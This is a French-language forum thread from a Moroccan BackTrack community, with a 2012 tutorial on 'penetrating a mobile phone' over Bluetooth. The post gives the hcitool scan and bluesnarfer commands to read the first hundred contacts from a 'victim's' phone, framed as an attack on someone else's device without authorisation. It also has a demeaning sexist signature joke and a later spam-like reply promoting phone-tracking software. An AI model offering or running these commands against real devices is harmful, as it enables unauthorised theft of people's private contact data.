Index du Forum

communauté marocaine des utilisateurs de backtrack

Index du ForumFAQRechercherS’enregistrerConnexion
:: Pénétrer dans un Téléphone Portable ::

Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Outils, codes et astuces -> Tutos et Howto
Sujet précédent :: Sujet suivant  
Auteur Message
skyme

MessagePosté le: Dim 14 Oct - 10:36 (2012)    Sujet du message: Pénétrer dans un Téléphone Portable Répondre en citant

Pénétrer dans un Téléphone Portable 

Je vais vous expliquez, dans ce tutoriel comment pénétrer dans un téléphone portable à l'aide d'un ordinateur doté de BackTrack ou Ubuntu

On va devoir utiliser les packets suivant :
  • hcitool
  • Bluesnarfer
Je peux vous renvoyer directement sur ce lien pour l'installation de Bluesnarfer pour ubuntu qui ne le possède pas en natif (imagé, et assez clair dans l'ensemble) : ICI

On commence par scanner avec hcitool :
Code:
sudo hcitool scan

En faisant ceci, vous allez voir s'afficher sur votre écran quelque chose de semblable :
Code:
Adresse MAC    00:15:AB:6D:15:8F            Nom du Bluetooth      Portable_De_Victime

Copiez l'adresse MAC du portable la victime.
Maintenant nous n'aurons plus besoin d'Hcitool, on va donc utiliser Bluesnarfer :
Code:
sudo bluesnarfer -r 1-100 -b 00:15:AB:6D:15:8F
Explications :
-r vous permet d'accèder à la liste de contact du Nième au Xième contact, ici on aurait donc vu les 100 premiers contacts (dans l'ordre alphabétique) de notre victime.
-b permet d'indiquer sur quel téléphone on doit lancer l'attaque, il faudra donc y placer l'adresse MAC de la victime.
Avec cette commande, on peut donc voir les contacts que le Portable_De_Victime contient.
Il existe d'autres commandes que je vous invite à tester en utilisant l'aide interne de Bluesnarfer. Car le principe fondamental reste le même.  

La différence entre Linux et Windows, c'est que Linux c'est comme une belle fille, il faut l'apprivoiser, la comprendre, la séduire tandis que Windows, c'est comme une prostitué, il faut payer et surtout bien se protéger.

Skyme
Les membres suivants remercient skyme pour ce message :
Inf3rnus (23/10/12)

Publicité

MessagePosté le: Dim 14 Oct - 10:36 (2012)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
karlolo

MessagePosté le: Sam 21 Mar - 16:37 (2015)    Sujet du message: un bon logiciel de localisation portable Répondre en citant

Comme je vais souvent au Maroc et que j ai une petite mémoire. J ai décidé d'installer un logiciel de localisation portable sur mon telephone. Je peux le retrouver quand je le perd et surtout me retrouver quand je me perds!! Vu que je ne suis pas un as de l informatique, il localise un portable grace a son numero.

Contenu Sponsorisé

MessagePosté le: Aujourd’hui à 20:23 (2017)    Sujet du message: Pénétrer dans un Téléphone Portable

Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Outils, codes et astuces -> Tutos et Howto Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

Sauter vers:  

Index | Panneau d’administration | forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation

© Alien 2012